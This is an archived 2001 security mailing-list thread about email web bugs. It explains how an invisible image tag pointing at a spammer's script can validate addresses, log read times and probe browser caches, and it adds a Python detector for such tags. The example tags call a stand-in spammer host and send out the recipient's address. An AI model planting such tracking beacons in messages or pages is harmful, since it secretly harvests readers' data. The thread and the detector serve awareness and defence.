afaik, webbugs work like this:

Spammer X sends you an HTML mail with an invisible image from his site
( <img src=http://www.weluvspam.com/bug.gif height=1 width=1> )

When you read this email in Outlook, the image (bug.gif) is downloaded from
the spammer's site. If the image is generated by a CGI script he can log the
time you read your mail, and validate your address.

For example, instead of bug.gif, he could use a script to create the image:

<img src="http://www.weluvspam.com/createimage.php?mail=youremailat_private">

The script (createimage.php) could:

- save the "mail=youremailat_private" parameter to a database of valid email
  addresses
- save the time of the day you checked your mail (combined with the time the
  email was sent - taken from a database - it can be used to know how often a
  person checks his mail, and at what time)
- determine whether you visited a certain website recently (timing how long
  it takes to load an image from that website. If it loads immediately, then
  you probably have it in your browser's cache)

Mariano

----- Original Message -----
From: "Dom De Vitto" <Domat_private>
To: "Peter Pekala" <peterpat_private>; "abuse" <postmasterat_private>; "Focus-MS" <focus-msat_private>
Cc: "VULN-DEV@SECURITYFOCUS.COM" <VULN-DEVat_private>; "BUGTRAQ@SECURITYFOCUS.COM" <BUGTRAQat_private>; <win2ksecadviceat_private>
Sent: Tuesday, August 28, 2001 5:42 AM
Subject: RE: Email webbugs

> Webbugs are NOT return receipts!!
> Everybody should *at least* have return-receipts set to 'prompt'.
> That is a no-brainer.
> Web bugs are totally different, and can divulge a lot more information -
> especially when tallied with cross-host information.
>
> Dom
> -----Original Message-----
> From: Peter Pekala [mailto:peterpat_private]
> Sent: 27 August 2001 17:11
> To: abuse; Focus-MS
> Cc: VULN-DEV@SECURITYFOCUS.COM; BUGTRAQ@SECURITYFOCUS.COM;
> win2ksecadviceat_private
> Subject: Re: Email webbugs
>
>
> In Outlook Express - Have you tried configuring this through Tools -
> Options - Receipts - Returning Read Receipts ?
>
> - Peter
>
>
> : One of the things that has always bothered me about Outlook Express and
> : Outlook is that they are susceptible to webbugs. Basically there are no
> : options to block confirmation of your reading an email so any spammer can
> : verify that your address is active as long as they can get you to just
> : view an email.
> :
> : A lot of people have difficulty understanding exactly what this means so I
> : set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an
> : attempt to raise awareness of this nonsense and get MS to do something
> : about it. I don't know if other email programs like Eudora and Netscape are
> : vulnerable to email webbugs so if anyone tests those please let me know
> : the results.
> :
> : Anyway, I've made the test site available to the public now so if you want
> : to check your email reader, feel free.
> :
> : Geo.
> :
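A check a mail filter or client could run against the two kinds of tag described in the message above, before any image is fetched. This is an added example, not part of the original thread; the function names, the 0/1-pixel threshold and the reason labels are assumptions, and the sample body and the reader@example.org address are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

class WebBugFinder(HTMLParser):
    """Collect <img> tags that would cause a remote fetch when the mail is rendered."""
    def __init__(self, recipient):
        super().__init__()
        self.recipient = recipient.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        src = a.get("src", "")
        parts = urlsplit(src)
        if parts.scheme not in ("http", "https"):
            return  # cid:, data: and relative sources cause no remote request
        reasons = []
        # Invisible image: both dimensions are 0 or 1 pixel.
        if a.get("width") in ("0", "1") and a.get("height") in ("0", "1"):
            reasons.append("invisible")
        # Recipient address in the URL lets the server validate it on fetch.
        if self.recipient and self.recipient in unquote(src).lower():
            reasons.append("recipient-in-url")
        elif parts.query:
            # Any query string means the image can be generated per message.
            reasons.append("query-string")
        if reasons:
            self.findings.append((parts.hostname, src, reasons))

def find_web_bugs(html_body, recipient):
    finder = WebBugFinder(recipient)
    finder.feed(html_body)
    return finder.findings

# Constructed sample body, modelled on the two tags described in the message.
SAMPLE = """<html><body><p>Hello</p>
<img src=http://www.weluvspam.com/bug.gif height=1 width=1>
<img src="http://www.weluvspam.com/createimage.php?mail=reader%40example.org">
<img src="cid:logo@local" width=120 height=40>
</body></html>"""

if __name__ == "__main__":
    for host, src, reasons in find_web_bugs(SAMPLE, "reader@example.org"):
        print(host, src, ",".join(reasons))
```

A static check like this only covers the address-validation and read-time cases; the reliable mitigation is for the client not to load remote images at all when displaying mail.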
This archive was generated by hypermail 2b30 : Tue Aug 28 2001 - 12:46:16 PDT